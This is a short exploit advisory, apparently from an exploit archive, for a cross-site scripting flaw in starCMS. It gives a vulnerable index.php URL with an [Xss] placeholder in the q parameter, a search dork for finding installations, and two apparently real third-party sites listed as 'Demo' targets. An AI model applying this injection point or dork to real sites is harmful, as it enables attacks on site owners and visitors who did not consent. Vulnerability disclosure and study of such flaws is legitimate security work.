starCMS suffers from a cross site scripting vulnerability.
0ab766f39fa722493d5f61b7bc28a9c748cf87f6f638c9e384ea520eae78ef72
#######################################################################################
# #
# Exploit Title : starCMS Cross-Site Scripting Vulnerabilitiy #
# #
# Author : Zarbat.Org & IrIsT.Ir #
# #
# Discovered By : Am!r #
# #
# Home : http://Zarbat.Org/forums/ #
# #
# Software Link : http://www.starcms.net/ #
# #
# Security Risk : High #
# #
# Version : All Version #
# #
# Tested on : GNU/Linux Ubuntu - Windows Server - win7 #
# #
# Dork : "powered by starCMS" #
# #
#######################################################################################
# #
# Expl0iTs : #
# #
# [TarGeT]/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes #
# #
#######################################################################################
# #
# Demo: #
# #
# changestrategy.eu/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes #
# #
# forumfinanzplaner.at/index.php?q=[Xss]&r=5&actionsuche=yes #
# #
#######################################################################################
# #
# Greats : Aria-Security.Com - datacoders.org - black-hg.org - Ashiyane.Org #
# #
# Security7.ir & And All Iranian Hackers #
# #
#######################################################################################